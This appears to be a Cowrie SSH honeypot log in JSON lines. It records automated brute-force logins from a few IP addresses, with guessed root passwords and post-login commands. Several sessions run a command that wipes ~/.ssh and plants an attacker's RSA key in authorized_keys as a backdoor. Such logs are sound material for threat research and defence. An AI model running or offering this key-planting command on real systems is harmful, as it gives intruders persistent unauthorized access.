{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:31:43.671846Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.672519Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.696005Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:43.696951Z","src_ip":"212.227.125.160","session":"79e600354fa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38876,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa8d9b857726","protocol":"ssh","message":"New connection: 212.227.125.160:38876 (1.2.3.4:22) [session: fa8d9b857726]","sensor":"my-vps","timestamp":"2025-08-26T10:31:46.205181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:31:46.206138Z","src_ip":"212.227.125.160","session":"fa8d9b857726"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T10:31:46.257385Z","src_ip":"212.227.125.160","session":"fa8d9b857726"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T10:31:47.098480Z","src_ip":"212.227.125.160","session":"fa8d9b857726"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:31:48.371844Z","src_ip":"212.227.125.160","session":"fa8d9b857726"}
{"eventid":"cowrie.session.closed","duration":30.62965202331543,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:03.099552Z","src_ip":"212.227.125.160","session":"728ea05da965"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49042,"dst_ip":"1.2.3.4","dst_port":22,"session":"19c1162a76fd","protocol":"ssh","message":"New connection: 212.227.235.229:49042 (1.2.3.4:22) [session: 19c1162a76fd]","sensor":"my-vps","timestamp":"2025-08-26T10:32:05.884508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:05.885339Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:06.139681Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.login.success","username":"root","password":"root.123","message":"login attempt [root/root.123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:32:07.684805Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:32:08.275866Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:32:08.276656Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:32:08.277792Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:08.542535Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:32:09.083721Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.084483Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.345137Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.346049Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47166,"dst_ip":"1.2.3.4","dst_port":22,"session":"3865fb4cea64","protocol":"ssh","message":"New connection: 212.227.235.229:47166 (1.2.3.4:22) [session: 3865fb4cea64]","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.614318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.614979Z","src_ip":"212.227.235.229","session":"3865fb4cea64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:09.875014Z","src_ip":"212.227.235.229","session":"3865fb4cea64"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:32:10.960738Z","src_ip":"212.227.235.229","session":"3865fb4cea64"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:12.224302Z","src_ip":"212.227.235.229","session":"3865fb4cea64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47178,"dst_ip":"1.2.3.4","dst_port":22,"session":"37542c560676","protocol":"ssh","message":"New connection: 212.227.235.229:47178 (1.2.3.4:22) [session: 37542c560676]","sensor":"my-vps","timestamp":"2025-08-26T10:32:13.500063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:13.500941Z","src_ip":"212.227.235.229","session":"37542c560676"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:14.777876Z","src_ip":"212.227.235.229","session":"37542c560676"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:32:15.568165Z","src_ip":"212.227.235.229","session":"37542c560676"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:15.831586Z","src_ip":"212.227.235.229","session":"37542c560676"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:16.501983Z","src_ip":"212.227.235.229","session":"19c1162a76fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53562,"dst_ip":"1.2.3.4","dst_port":22,"session":"d992da512b3f","protocol":"ssh","message":"New connection: 212.227.235.229:53562 (1.2.3.4:22) [session: d992da512b3f]","sensor":"my-vps","timestamp":"2025-08-26T10:32:30.002987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:30.005415Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:30.284279Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.login.success","username":"root","password":"md@123","message":"login attempt [root/md@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:32:31.393055Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:32:31.999533Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:32:32.000194Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:32:32.001003Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:32.281565Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:32:32.918190Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:32:32.918912Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:32:33.199343Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:33.200347Z","src_ip":"212.227.235.229","session":"d992da512b3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54332,"dst_ip":"1.2.3.4","dst_port":22,"session":"0760d6288177","protocol":"ssh","message":"New connection: 212.227.235.229:54332 (1.2.3.4:22) [session: 0760d6288177]","sensor":"my-vps","timestamp":"2025-08-26T10:32:33.463962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:32:33.466336Z","src_ip":"212.227.235.229","session":"0760d6288177"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:32:33.729625Z","src_ip":"212.227.235.229","session":"0760d6288177"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:32:34.795375Z","src_ip":"212.227.235.229","session":"0760d6288177"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39158,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1c6f8b80c80","protocol":"ssh","message":"New connection: 196.251.86.249:39158 (1.2.3.4:22) [session: c1c6f8b80c80]","sensor":"my-vps","timestamp":"2025-08-26T10:32:35.508514Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.069622Z","src_ip":"212.227.235.229","session":"0760d6288177"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:32:36.126538Z","src_ip":"196.251.86.249","session":"c1c6f8b80c80"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 